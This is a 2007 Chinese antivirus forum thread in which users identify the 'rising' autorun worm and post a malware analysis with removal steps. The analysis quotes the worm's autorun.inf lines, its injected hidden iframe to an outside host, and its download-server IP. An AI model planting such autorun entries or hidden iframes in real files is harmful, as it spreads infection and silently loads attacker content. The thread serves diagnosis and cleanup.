查看: 2549|回复: 6
收起左侧

请教高手!

[复制链接]
saite
发表于 2007-8-5 23:32:10 | 显示全部楼层 |阅读模式
在我的windows系统目录下有
C:\WINDOWS\rising154.exe
C:\WINDOWS\rising243.exe
C:\WINDOWS\rising452.exe
C:\WINDOWS\rising461.exe
C:\WINDOWS\rising542.exe
C:\WINDOWS\rising601.exe
C:\WINDOWS\rising707.exe
C:\WINDOWS\rising729.exe
C:\WINDOWS\rising751.exe
C:\WINDOWS\rising782.exe
这几个是什么程序?是木马么?我用kis6.0 621  +avg7.5 扫描均未报警!并且我的系统explorer进程出现占用
cpu50%的现象(双核)。主动防御提示
2007-8-5 23:32:12 C:\WINDOWS\EXPLORER.EXE 试图加载新的或已经修改了的模块 C:\Program Files\TuneUp Utilities 2006\Integrator.exe 到进程.
2007-8-5 23:32:12 C:\WINDOWS\EXPLORER.EXE 试图加载新的或已经修改了的模块 C:\Program Files\TuneUp Utilities 2006\KeyGen.exe 到进程.
2007-8-5 23:32:12 C:\WINDOWS\EXPLORER.EXE 试图加载新的或已经修改了的模块 C:\Program Files\TuneUp Utilities 2006\DiskCleaner.exe 到进程.
2007-8-5 23:32:12 C:\WINDOWS\EXPLORER.EXE 试图加载新的或已经修改了的模块 C:\Program Files\TuneUp Utilities 2006\DiskCleaner.exe 到进程.
2007-8-5 23:32:12 C:\WINDOWS\EXPLORER.EXE 试图加载新的或已经修改了的模块 C:\Program Files\TuneUp Utilities 2006\ProcessManager.exe 到进程.
我当时并未浏览这个目录!


请教高手这几个是什么程序,我该如何处理。

[ 本帖最后由 saite 于 2007-8-6 00:04 编辑 ]
mds
发表于 2007-8-6 12:03:55 | 显示全部楼层
MS是病毒!
用SREng扫个详细报告贴上来!
zerosu6652
发表于 2007-8-6 12:26:58 | 显示全部楼层

不知道是不是传说中的瑞星病毒!!!

[ 本帖最后由 zerosu6652 于 2007-8-6 12:29 编辑 ]
zerosu6652
发表于 2007-8-6 12:29:30 | 显示全部楼层
这个病毒会导致双击盘符出现"打开方式",而且一般出现在杀毒结束后,当你双击出现"打开方式"时,你的计算机其实已经中毒了.

在每个盘根目录下都有rising.exe和autorun.inf这两个文件,都是隐藏的,只要删掉两个文件中的任何一个,刷新又会出现两个文件。

autorun.inf文件内容:

[AutoRun]
open=rising.exe
shellexecute=rising.exe
shell\Auto\command=rising.exe。

下载 AntiAutorun.rar 20.8KB 超级巡警之自动播放及U盘病毒免疫器

在专杀工具,就不怕这东东了。

目前感染此类病毒后,使用卡巴斯基,瑞星,江民都检测不到这个病毒,更无法清除。

本人在DOS,安全模式下,使用各种杀毒软件,均不能杀掉。

(1)方法:

先删除rising.exe,然后马上修改autorun.inf内容,删除其内容中的“=”号后面的江西,保存。这样就不会出现Rising.exe,记住,只能保存,更不要删除autorun.inf文件或更名,一旦这样做,rising.exe又会出现。再使用本站的[超级巡警之U盘和系统盘病毒免疫器V1.1正式版]免疫。但不太彻底。

(2)经测试:

请使用Auto病毒专杀V2.0B5可查杀此病毒,但务必请在安全模式下查杀。



手动删除的方法是:
们需要手工来删除AutoRun.inf这个文件,在“命令提示符”下输入“attrib autorun.inf -s -h -r”去掉它的“系统”、“只读”、“隐藏”属性,这样输入“del autorun.inf”才可以删除。接着进入注册表查找“COMMAND.EXE”键值项,找到后将整个shell子键删除,这样C盘就可以打开了,按照同样的方法将其他盘依次也删除即可。
但是不知道为什么,我用此方法却不行,于是我想了另外个办法

在“开始”菜单的“运行”中输入Regedit,打开注册表编辑器,展开到HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Policies Exploer主键下,在右侧窗口中找到“NoDriveTypeAutoRun”,就是它决定了是否执行CDROM或硬盘的AutoRun功能。将其键值改为9D,00,00,00就可以关闭硬盘的AutoRun功能,如果改为B5,00,00,00则禁止光盘的AutoRun功能。修改后重新启动计算机,设置就会生效。


此次变种可谓是集N种破坏性病毒之大成了。主要破坏功能有:1.感染exe 并使得被感染的exe的公司等属性变为“番茄花园”

  2.感染html asp 等文件 插入恶意代码
  3.通过双击磁盘启动
  4.下载木马,盗取网游帐号
  5.修改注册表 使系统无法显示隐藏文件
  6.通过hook API 函数 导致任务管理器中 无法看见其进程

分析报告如下:
File: rising.exe
Size: 64775 bytes
File Version: 1.00
MD5: 86311B37D938BB35645E7B092014DD63
SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3
CRC32: 88ABBD9B
rising.exe 运行后 首先释放一个rising.eve的文件 然后由rising.exe启动他
之后 释放139CA82A.EXE 139CA82A.dll(随机的8个数字字母组合成的文件名)到系统文件夹
注册服务139CA82A.EXE
139CA82A.EXE控制winlogon进程 使得139CA82A.dll插入几乎所有进程

释放rising.exe 和autorun.inf 到每个分区 使得双击磁盘启动
感染 除系统分区外的exe文件 使得其公司名全变为 番茄花园
感染 html asp 等文件 在其后面插入代码
<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>

修改系统时间 随机把年份往前调 月,日不变
修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue:
值为 0x00000000
导致无法显示临时文件

rising.exe 还会hook 多个 API函数 使其进程在任务管理器中隐藏

使用Explorer.exe连接网络 61.152.92.98:80下载木马
下载的木马一般为K117815XXXXX.exe
XXXXX代表随机
到系统文件夹

由于 每台机器上下载的木马的名称不同 但最后结果相同 所以中间释放的过程省略
最后 这些木马运行后分别释放了如下文件
C:\WINDOWS\system32\buchehuo.exe(创建了服务inetsvr)

C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe

C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe

C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe

C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe

C:\WINDOWS\system32\winsock.exe

临时文件夹下 释放upxdnd.exe和upxdnd.dll



解决办法:

  安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)

  首先把系统日期 改回来
  然后打开sreng(可到down.45it.com下载)
  启动项目 注册表 删除如下项目
<upxdnd><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.exe> []
<msccrt><C:\WINDOWS\msccrt.exe> []
<cmdbs><C:\WINDOWS\cmdbs.exe> []
<mppds><C:\WINDOWS\mppds.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<winform><C:\WINDOWS\winform.exe> []


  “启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
  选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
139CA82A / 139CA82A
Wireless Zero Conflguration / inetsvr


把下面的 代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"



  双击1.reg把这个注册表项导入注册表

  然后双击我的电脑-工具-文件夹选项-查看-显示所有文件和文件夹,把“隐藏受保护的系统文件”的勾去掉。

右键 点击C盘 点击右键菜单中的“打开”打开C盘 (千万不要双击)(如图)
删除 如下文件
C:\rising.exe
C:\autorun.inf
C:\WINDOWS\system32\buchehuo.exe
C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
C:\WINDOWS\unspapik.txt
C:\WINDOWS\wiasevct.txt
C:\WINDOWS\wiasvctr.txt
C:\WINDOWS\ganran.txt
C:\WINDOWS\system32\139CA82A.DLL(随机的8个数字字母组合成的文件名)
C:\WINDOWS\system32\139CA82A.EXE(随机的8个数字字母组合成的文件名)
C:\WINDOWS\system32\K117815XXXXX.exe(XXXXX代表随机数字)
清空C:\Documents and Settings\用户名\Local Settings\Temp
  右键 点击分别打开系统分区以外的分区 还是点击右键菜单中的“打开” (千万不要双击)

  删除每个分区下面的autorun.inf和rising.exe文件

  最后使用专杀 全盘杀毒
kasper
发表于 2007-8-6 20:13:20 | 显示全部楼层
rising病毒,全国人民都来看啊~~~
saite
 楼主| 发表于 2007-8-7 10:56:22 | 显示全部楼层

好麻烦啊!
我前两天是在受不了了,重装系统了!
谢过各位大虾!
卡江东N
发表于 2007-8-7 12:02:19 | 显示全部楼层
瑞星自杀?
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-3-19 01:54 , Processed in 0.117978 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表